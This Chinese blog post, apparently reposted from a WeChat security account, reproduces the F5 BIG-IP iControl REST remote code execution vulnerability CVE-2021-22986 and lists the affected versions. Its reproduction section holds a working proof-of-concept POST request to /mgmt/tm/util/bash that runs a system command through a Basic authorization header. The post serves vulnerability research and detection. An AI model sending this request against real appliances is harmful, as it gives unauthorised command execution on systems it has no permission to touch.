F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

admin 2021年3月22日08:27:47评论231 views字数 1136阅读3分47秒阅读模式

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)


F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)


一、简介

该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。


二、影响版本


F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2


三、漏洞复现

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

POC:

POST /mgmt/tm/util/bash HTTP/1.1Host: 127.0.0.1Connection: closeContent-Length: 41Cache-Control: max-age=0Authorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Upgrade-Insecure-Requests: 1Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}

执行效果:

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

编写检测脚本:

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)


参考:

https://mp.weixin.qq.com/s/ZtE7R4PPgdWY9ea06A9wqQ

https://mp.weixin.qq.com/s/ZpbJwQ3tTNvSKCIRrPl3hg


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

博客主页:https://www.yuque.com/thelostworld

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)


本文始发于微信公众号(thelostworld):F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月22日08:27:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   F5 BIG-IP远程代码执行漏洞(CVE-2021-22986)http://cn-sec.com/archives/296431.html

发表评论

匿名网友 填写信息